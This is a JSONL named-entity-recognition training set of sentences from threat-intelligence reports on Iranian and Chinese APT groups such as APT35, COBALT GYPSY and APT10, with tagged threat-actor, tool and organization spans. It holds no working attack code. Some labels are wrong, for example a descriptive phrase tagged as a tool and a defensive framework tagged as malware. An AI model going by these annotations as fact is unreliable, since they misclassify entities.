{"text": "Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: attackers": [[42, 51]], "THREAT_ACTOR: threat actors": [[77, 90]], "THREAT_ACTOR: APT35": [[126, 131]]}, "info": {"id": "dnrti_train_000844", "source": "dnrti_train"}}
{"text": "The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) .", "spans": {"TOOL: PupyRAT": [[24, 31]], "TOOL: remote access trojan": [[64, 84]], "TOOL: RAT": [[87, 90]]}, "info": {"id": "dnrti_train_000845", "source": "dnrti_train"}}
{"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks .", "spans": {"THREAT_ACTOR: APT35": [[13, 18]]}, "info": {"id": "dnrti_train_000846", "source": "dnrti_train"}}
{"text": "CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: threat actor": [[150, 162]], "THREAT_ACTOR: Mia Ash": [[178, 185]]}, "info": {"id": "dnrti_train_000847", "source": "dnrti_train"}}
{"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims .", "spans": {}, "info": {"id": "dnrti_train_000848", "source": "dnrti_train"}}
{"text": "COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[0, 12]], "ORGANIZATION: financial services organizations": [[100, 132]], "ORGANIZATION: individual victims": [[191, 209]]}, "info": {"id": "dnrti_train_000849", "source": "dnrti_train"}}
{"text": "The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 .", "spans": {"THREAT_ACTOR: threat actor": [[60, 72]]}, "info": {"id": "dnrti_train_000850", "source": "dnrti_train"}}
{"text": "Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations .", "spans": {"ORGANIZATION: CTU": [[50, 53]]}, "info": {"id": "dnrti_train_000851", "source": "dnrti_train"}}
{"text": "The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks .", "spans": {"TOOL: PowerShell command": [[16, 34]], "TOOL: PupyRAT": [[103, 110]], "TOOL: research and penetration-testing tool": [[115, 152]]}, "info": {"id": "dnrti_train_000852", "source": "dnrti_train"}}
{"text": "The survey contained macros that , once enabled , downloaded PupyRAT .", "spans": {"TOOL: PupyRAT": [[61, 68]]}, "info": {"id": "dnrti_train_000853", "source": "dnrti_train"}}
{"text": "CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: COBALT GYPSY": [[36, 48]], "THREAT_ACTOR: threat group": [[49, 61]]}, "info": {"id": "dnrti_train_000854", "source": "dnrti_train"}}
{"text": "The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": {"ORGANIZATION: employees": [[79, 88]]}, "info": {"id": "dnrti_train_000855", "source": "dnrti_train"}}
{"text": "By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives .", "spans": {}, "info": {"id": "dnrti_train_000857", "source": "dnrti_train"}}
{"text": "These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[35, 47]], "THREAT_ACTOR: Mia Ash": [[125, 132]]}, "info": {"id": "dnrti_train_000858", "source": "dnrti_train"}}
{"text": "CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: group": [[112, 117]]}, "info": {"id": "dnrti_train_000859", "source": "dnrti_train"}}
{"text": "The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets .", "spans": {"TOOL: Mia Ash": [[15, 22]], "THREAT_ACTOR: threat actors": [[80, 93]]}, "info": {"id": "dnrti_train_000860", "source": "dnrti_train"}}
{"text": "SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[0, 31]], "ORGANIZATION: CTU": [[34, 37]], "ORGANIZATION: organization": [[112, 124]]}, "info": {"id": "dnrti_train_000864", "source": "dnrti_train"}}
{"text": "SecureWorks® Counter Threat Unit™ ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[0, 33]], "ORGANIZATION: CTU": [[36, 39]], "ORGANIZATION: organization": [[114, 126]]}, "info": {"id": "dnrti_train_000865", "source": "dnrti_train"}}
{"text": "CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: threat actors": [[58, 71]], "THREAT_ACTOR: COBALT GYPSY": [[120, 132]], "THREAT_ACTOR: threat group": [[133, 145]], "THREAT_ACTOR: Threat Group-2889": [[165, 182]]}, "info": {"id": "dnrti_train_000866", "source": "dnrti_train"}}
{"text": "Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns .", "spans": {"THREAT_ACTOR: attacker group": [[22, 36]]}, "info": {"id": "dnrti_train_000867", "source": "dnrti_train"}}
{"text": "This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 .", "spans": {"THREAT_ACTOR: cyber-espionage group": [[5, 26]], "THREAT_ACTOR: Rocket Kitten": [[40, 53]]}, "info": {"id": "dnrti_train_000868", "source": "dnrti_train"}}
{"text": "Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States .", "spans": {"TOOL: unsophisticated technical merit": [[28, 59]]}, "info": {"id": "dnrti_train_000869", "source": "dnrti_train"}}
{"text": "The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"THREAT_ACTOR: hacking group": [[74, 87]], "THREAT_ACTOR: Ajax Security": [[105, 118]], "THREAT_ACTOR: Flying Kitten": [[136, 149]], "ORGANIZATION: CrowdStrike": [[155, 166]], "ORGANIZATION: dissidents": [[221, 231]]}, "info": {"id": "dnrti_train_000870", "source": "dnrti_train"}}
{"text": "An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"THREAT_ACTOR: hacking group": [[11, 24]], "THREAT_ACTOR: Ajax Security": [[40, 53]], "THREAT_ACTOR: Flying Kitten": [[69, 82]], "ORGANIZATION: CrowdStrike": [[88, 99]], "ORGANIZATION: dissidents": [[154, 164]]}, "info": {"id": "dnrti_train_000871", "source": "dnrti_train"}}
{"text": "ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) .", "spans": {"ORGANIZATION: ClearSky": [[0, 8]], "TOOL: Gholee": [[107, 113]]}, "info": {"id": "dnrti_train_000873", "source": "dnrti_train"}}
{"text": "The Rocket Kitten attacker group 's main attack vector is spear-phishing .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[4, 17]], "THREAT_ACTOR: attacker group": [[18, 32]]}, "info": {"id": "dnrti_train_000874", "source": "dnrti_train"}}
{"text": "After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[53, 72]], "ORGANIZATION: Check Point": [[97, 108]]}, "info": {"id": "dnrti_train_000875", "source": "dnrti_train"}}
{"text": "As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[44, 57]], "THREAT_ACTOR: attackers": [[58, 67]]}, "info": {"id": "dnrti_train_000876", "source": "dnrti_train"}}
{"text": "While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight .", "spans": {"ORGANIZATION: Trend Micro": [[28, 39]], "ORGANIZATION: ClearSky": [[44, 52]], "THREAT_ACTOR: Spy Kittens": [[61, 72]], "THREAT_ACTOR: Rocket Kitten": [[84, 97]]}, "info": {"id": "dnrti_train_000877", "source": "dnrti_train"}}
{"text": "As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[7, 26]], "ORGANIZATION: Trend Micro": [[116, 127]], "ORGANIZATION: ClearSky": [[132, 140]]}, "info": {"id": "dnrti_train_000878", "source": "dnrti_train"}}
{"text": "Magic Hound will often find simpler ways for effective compromise , such as creative phishing and simple custom malware .", "spans": {}, "info": {"id": "dnrti_train_000879", "source": "dnrti_train"}}
{"text": "We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten .", "spans": {"THREAT_ACTOR: Behzad Mesri": [[34, 46]], "THREAT_ACTOR: Charming Kitten": [[128, 143]]}, "info": {"id": "dnrti_train_000880", "source": "dnrti_train"}}
{"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 .", "spans": {"THREAT_ACTOR: threat groups": [[212, 225]], "THREAT_ACTOR: Oilrig1": [[236, 243]], "THREAT_ACTOR: CopyKittens2": [[248, 260]]}, "info": {"id": "dnrti_train_000881", "source": "dnrti_train"}}
{"text": "A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri .", "spans": {"THREAT_ACTOR: Flying Kitten": [[115, 128]], "THREAT_ACTOR: Rocket Kitten": [[132, 145]]}, "info": {"id": "dnrti_train_000882", "source": "dnrti_train"}}
{"text": "FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: Flying Kitten": [[78, 91], [157, 170]], "ORGANIZATION: aviation firms": [[114, 128]]}, "info": {"id": "dnrti_train_000883", "source": "dnrti_train"}}
{"text": "To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's .", "spans": {"THREAT_ACTOR: hacker": [[20, 26]], "THREAT_ACTOR: Behzad Mesri": [[29, 41], [249, 261]], "THREAT_ACTOR: Turk Black Hat": [[57, 71]], "THREAT_ACTOR: ArYaIeIrAn": [[83, 93]], "TOOL: PersianDNS": [[157, 167]], "TOOL: Mahanserver": [[170, 181]], "ORGANIZATION: Facebook": [[230, 238]]}, "info": {"id": "dnrti_train_000884", "source": "dnrti_train"}}
{"text": "Charming kitten regularly target international media outlets with Persian-language services .", "spans": {"THREAT_ACTOR: Charming kitten": [[0, 15]]}, "info": {"id": "dnrti_train_000885", "source": "dnrti_train"}}
{"text": "It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report .", "spans": {"TOOL: DownPaper malware": [[79, 96]]}, "info": {"id": "dnrti_train_000886", "source": "dnrti_train"}}
{"text": "In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) .", "spans": {"TOOL: PlugX": [[21, 26]], "TOOL: Poison Ivy": [[31, 41]], "TOOL: PIVY": [[44, 48]], "THREAT_ACTOR: group": [[82, 87]], "TOOL: ChChes": [[127, 133]], "ORGANIZATION: Japan Computer Emergency Response Team Coordination Center": [[143, 201]], "ORGANIZATION: JPCERT": [[204, 210]]}, "info": {"id": "dnrti_train_000887", "source": "dnrti_train"}}
{"text": "Wapack labs also observed a similar sample targeting Japan in November .", "spans": {"ORGANIZATION: Wapack": [[0, 6]]}, "info": {"id": "dnrti_train_000888", "source": "dnrti_train"}}
{"text": "MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House .", "spans": {"THREAT_ACTOR: MenuPass": [[0, 8]], "ORGANIZATION: Sasakawa Peace Foundation": [[130, 155]], "ORGANIZATION: White House": [[164, 175]]}, "info": {"id": "dnrti_train_000889", "source": "dnrti_train"}}
{"text": "menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns .", "spans": {"TOOL: DDNS and actor-registered domains": [[41, 74]]}, "info": {"id": "dnrti_train_000890", "source": "dnrti_train"}}
{"text": "There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) .", "spans": {"THREAT_ACTOR: menuPass": [[67, 75]], "THREAT_ACTOR: Stone Panda": [[92, 103]], "THREAT_ACTOR: APT10": [[108, 113]]}, "info": {"id": "dnrti_train_000891", "source": "dnrti_train"}}
{"text": "A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "TOOL: PIVY": [[56, 60]]}, "info": {"id": "dnrti_train_000892", "source": "dnrti_train"}}
{"text": "Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed .", "spans": {"THREAT_ACTOR: group": [[76, 81]], "ORGANIZATION: defense contractors": [[132, 151]]}, "info": {"id": "dnrti_train_000893", "source": "dnrti_train"}}
{"text": "menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets .", "spans": {}, "info": {"id": "dnrti_train_000894", "source": "dnrti_train"}}
{"text": "menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy .", "spans": {}, "info": {"id": "dnrti_train_000895", "source": "dnrti_train"}}
{"text": "menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future .", "spans": {}, "info": {"id": "dnrti_train_000896", "source": "dnrti_train"}}
{"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": {"MALWARE: ChopShop1": [[0, 9]], "ORGANIZATION: MITRE Corporation": [[46, 63]]}, "info": {"id": "dnrti_train_000897", "source": "dnrti_train"}}
{"text": "PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries .", "spans": {"TOOL: Immunity Debugger": [[68, 85]]}, "info": {"id": "dnrti_train_000898", "source": "dnrti_train"}}
{"text": "Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com .", "spans": {"TOOL: Poison Ivy": [[0, 10]]}, "info": {"id": "dnrti_train_000899", "source": "dnrti_train"}}
{"text": "First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 .", "spans": {}, "info": {"id": "dnrti_train_000900", "source": "dnrti_train"}}
{"text": "Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying .", "spans": {"TOOL: Poison Ivy": [[0, 10]], "TOOL: RATs": [[58, 62]]}, "info": {"id": "dnrti_train_000901", "source": "dnrti_train"}}
{"text": "APT40 was previously reported as TEMP.Periscope and TEMP.Jumper .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "THREAT_ACTOR: TEMP.Periscope": [[33, 47]], "THREAT_ACTOR: TEMP.Jumper": [[52, 63]]}, "info": {"id": "dnrti_train_000902", "source": "dnrti_train"}}
{"text": "They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult .", "spans": {"THREAT_ACTOR: attacker": [[99, 107]], "TOOL: RATs": [[141, 145]]}, "info": {"id": "dnrti_train_000903", "source": "dnrti_train"}}
{"text": "In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system .", "spans": {"TOOL: PIVY": [[55, 59]], "THREAT_ACTOR: attackers": [[62, 71]], "TOOL: RAT": [[81, 84]], "ORGANIZATION: security firm RSA": [[99, 116]]}, "info": {"id": "dnrti_train_000904", "source": "dnrti_train"}}
{"text": "Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": {"TOOL: PIVY": [[16, 20]], "VULNERABILITY: zero-day exploit": [[42, 58]]}, "info": {"id": "dnrti_train_000906", "source": "dnrti_train"}}
{"text": "The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering .", "spans": {"TOOL: Poison Ivy": [[4, 14]], "THREAT_ACTOR: attackers": [[34, 43]]}, "info": {"id": "dnrti_train_000907", "source": "dnrti_train"}}
{"text": "Attackers can point and click their way through a compromised network and exfiltrate data .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_000908", "source": "dnrti_train"}}
{"text": "Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time—attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware .", "spans": {"TOOL: RATs": [[10, 14]], "THREAT_ACTOR: threat actor": [[80, 92]], "TOOL: Poison Ivy-based malware": [[182, 206]]}, "info": {"id": "dnrti_train_000909", "source": "dnrti_train"}}
{"text": "This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan .", "spans": {"ORGANIZATION: PwC UK": [[53, 59]], "ORGANIZATION: BAE Systems": [[64, 75]], "THREAT_ACTOR: threat actor": [[147, 159]], "ORGANIZATION: managed IT service providers": [[168, 196]]}, "info": {"id": "dnrti_train_000910", "source": "dnrti_train"}}
{"text": "Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 .", "spans": {"ORGANIZATION: PwC UK": [[18, 24]], "ORGANIZATION: BAE Systems": [[29, 40]], "THREAT_ACTOR: APT10": [[116, 121]]}, "info": {"id": "dnrti_train_000911", "source": "dnrti_train"}}
{"text": "The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally .", "spans": {"ORGANIZATION: managed IT service providers": [[74, 102]], "ORGANIZATION: MSPs": [[105, 109], [217, 221]], "THREAT_ACTOR: APT10": [[123, 128]]}, "info": {"id": "dnrti_train_000912", "source": "dnrti_train"}}
{"text": "APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5], [220, 225]], "TOOL: Poison Ivy malware family": [[28, 53]], "ORGANIZATION: FireEye": [[67, 74]], "THREAT_ACTOR: threat actors": [[194, 207]]}, "info": {"id": "dnrti_train_000913", "source": "dnrti_train"}}
{"text": "APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: PlugX malware": [[21, 34]]}, "info": {"id": "dnrti_train_000914", "source": "dnrti_train"}}
{"text": "PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection .", "spans": {"ORGANIZATION: PwC UK": [[0, 6]], "ORGANIZATION: BAE Systems": [[11, 22]], "THREAT_ACTOR: APT10": [[55, 60]], "THREAT_ACTOR: threat actor": [[78, 90]], "THREAT_ACTOR: espionage": [[107, 116]]}, "info": {"id": "dnrti_train_000915", "source": "dnrti_train"}}
{"text": "APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: MSP networks": [[104, 116]], "ORGANIZATION: customers": [[138, 147]]}, "info": {"id": "dnrti_train_000916", "source": "dnrti_train"}}
{"text": "APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: FireEye": [[36, 43]], "THREAT_ACTOR: Red Apollo": [[69, 79]], "ORGANIZATION: PwC UK": [[83, 89]], "THREAT_ACTOR: CVNX": [[92, 96]], "ORGANIZATION: BAE Systems": [[100, 111]], "THREAT_ACTOR: Stone Panda": [[114, 125]], "ORGANIZATION: CrowdStrike": [[129, 140]], "THREAT_ACTOR: menuPass Team": [[147, 160]]}, "info": {"id": "dnrti_train_000917", "source": "dnrti_train"}}
{"text": "The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16], [160, 172]], "ORGANIZATION: FireEye": [[122, 129]], "TOOL: Poison Ivy malware family": [[187, 212]], "ORGANIZATION: Trend Micro3": [[231, 243]], "TOOL: EvilGrab malware": [[275, 291]]}, "info": {"id": "dnrti_train_000918", "source": "dnrti_train"}}
{"text": "The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16], [160, 172]], "ORGANIZATION: FireEye": [[122, 129]], "TOOL: Poison Ivy malware family": [[187, 212]], "ORGANIZATION: Trend Micro": [[231, 242]], "TOOL: EvilGrab malware": [[274, 290]]}, "info": {"id": "dnrti_train_000919", "source": "dnrti_train"}}
{"text": "APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: technology": [[151, 161]], "ORGANIZATION: telecommunications sector": [[166, 191]], "ORGANIZATION: MSPs": [[305, 309]]}, "info": {"id": "dnrti_train_000920", "source": "dnrti_train"}}
{"text": "The research and ongoing tracking of APT10 by both PwC UK and BAE .", "spans": {"THREAT_ACTOR: APT10": [[37, 42]], "ORGANIZATION: PwC UK": [[51, 57]], "ORGANIZATION: BAE": [[62, 65]]}, "info": {"id": "dnrti_train_000921", "source": "dnrti_train"}}
{"text": "APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: technology": [[150, 160]], "ORGANIZATION: telecommunications sector": [[165, 190]], "ORGANIZATION: MSPs": [[304, 308]]}, "info": {"id": "dnrti_train_000922", "source": "dnrti_train"}}
{"text": "PwC UK has been engaged in supporting investigations linked to APT10 compromises .", "spans": {"ORGANIZATION: PwC UK": [[0, 6]], "THREAT_ACTOR: APT10": [[63, 68]]}, "info": {"id": "dnrti_train_000923", "source": "dnrti_train"}}
{"text": "As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 .", "spans": {"THREAT_ACTOR: APT10": [[31, 36]]}, "info": {"id": "dnrti_train_000924", "source": "dnrti_train"}}
{"text": "Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis .", "spans": {"THREAT_ACTOR: threat actor": [[24, 36]]}, "info": {"id": "dnrti_train_000925", "source": "dnrti_train"}}
{"text": "APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: Poison Ivy": [[43, 53]], "TOOL: PlugX": [[166, 171]]}, "info": {"id": "dnrti_train_000926", "source": "dnrti_train"}}
{"text": "It is highly likely that this is due to the release of the 2013 FireEye report .", "spans": {"ORGANIZATION: FireEye": [[64, 71]]}, "info": {"id": "dnrti_train_000927", "source": "dnrti_train"}}
{"text": "Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions .", "spans": {"THREAT_ACTOR: APT10": [[62, 67]], "ORGANIZATION: MSPs": [[107, 111]], "ORGANIZATION: institutions": [[201, 213]]}, "info": {"id": "dnrti_train_000928", "source": "dnrti_train"}}
{"text": "MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 .", "spans": {"ORGANIZATION: MSPs": [[0, 4]], "THREAT_ACTOR: threat actors": [[67, 80]], "THREAT_ACTOR: APT10": [[89, 94]]}, "info": {"id": "dnrti_train_000929", "source": "dnrti_train"}}
{"text": "Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims .", "spans": {"ORGANIZATION: MSPs": [[41, 45]], "THREAT_ACTOR: APT10": [[58, 63]], "TOOL: MSP": [[87, 90]]}, "info": {"id": "dnrti_train_000930", "source": "dnrti_train"}}
{"text": "This , in turn , would provide access to a larger amount of intellectual property and sensitive data .", "spans": {}, "info": {"id": "dnrti_train_000931", "source": "dnrti_train"}}
{"text": "APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: MSPs": [[75, 79]]}, "info": {"id": "dnrti_train_000932", "source": "dnrti_train"}}
{"text": "The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains .", "spans": {"THREAT_ACTOR: APT10": [[56, 61]], "TOOL: dynamic-DNS domains": [[123, 142]]}, "info": {"id": "dnrti_train_000933", "source": "dnrti_train"}}
{"text": "Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs .", "spans": {"THREAT_ACTOR: APT10": [[95, 100]], "ORGANIZATION: MSPs": [[132, 136]]}, "info": {"id": "dnrti_train_000934", "source": "dnrti_train"}}
{"text": "The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan .", "spans": {"THREAT_ACTOR: APT10": [[98, 103]]}, "info": {"id": "dnrti_train_000935", "source": "dnrti_train"}}
{"text": "These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies .", "spans": {"ORGANIZATION: companies": [[144, 153]]}, "info": {"id": "dnrti_train_000936", "source": "dnrti_train"}}
{"text": "APT10 has , in the past , primarily been known for its targeting of government and US defence industrial base organisations , with the earliest known date of its activity being in December 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_000937", "source": "dnrti_train"}}
{"text": "Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China .", "spans": {"THREAT_ACTOR: APT10": [[9, 14]]}, "info": {"id": "dnrti_train_000938", "source": "dnrti_train"}}
{"text": "In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient .", "spans": {"THREAT_ACTOR: APT actor": [[27, 36]], "THREAT_ACTOR: threat actor": [[57, 69]], "TOOL: decoy documents": [[81, 96]]}, "info": {"id": "dnrti_train_000939", "source": "dnrti_train"}}
{"text": "This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX .", "spans": {"THREAT_ACTOR: APT10": [[37, 42]], "TOOL: Poison Ivy": [[123, 133]], "TOOL: PlugX": [[137, 142]]}, "info": {"id": "dnrti_train_000940", "source": "dnrti_train"}}
{"text": "We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials .", "spans": {"THREAT_ACTOR: APT10": [[37, 42]], "TOOL: MSP": [[75, 78]], "ORGANIZATION: MSPs": [[105, 109]]}, "info": {"id": "dnrti_train_000941", "source": "dnrti_train"}}
{"text": "In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B .", "spans": {"THREAT_ACTOR: APT10": [[43, 48]], "TOOL: mimikatz": [[100, 108]], "TOOL: PwDump": [[112, 118]], "TOOL: DLL load order hijacking": [[137, 161]]}, "info": {"id": "dnrti_train_000942", "source": "dnrti_train"}}
